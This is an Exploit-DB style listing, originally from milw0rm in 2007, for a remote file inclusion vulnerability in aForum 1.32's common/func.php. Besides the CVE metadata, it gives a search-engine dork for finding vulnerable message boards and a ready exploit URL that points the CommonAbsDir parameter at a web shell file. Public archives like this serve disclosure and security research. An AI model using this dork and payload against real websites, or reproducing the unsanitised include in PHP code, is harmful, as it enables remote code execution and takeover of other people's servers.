aForum 1.32 - 'CommonAbsDir' Remote File Inclusion
Author: ThE TiGeR
type: webapps
platform: php
port:
date_added: 2007-05-08
date_updated: 2016-09-30
verified: 1
codes: OSVDB-35907;CVE-2007-2634;OSVDB-35906;CVE-2007-2596
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comaforum.zip
#AForum =>1.33 Remote file inclusion (Func.php)
#Download Script : http://www.agner.org/software/msgbrd2/aforum.zip
#Thanks Str0ke
#D0rk:allintitle:List of messageboards
#Exploit :
#http://localhost/[aforum_path]/common/func.php?CommonAbsDir=shell.txt?
#Discovered By : ThE TiGeR
#Greetz : Reda, â„¢~${{BraveHeart}}$~â„¢
#Miro_Tiger100[at]Hotmail[dot]com
# milw0rm.com [2007-05-09]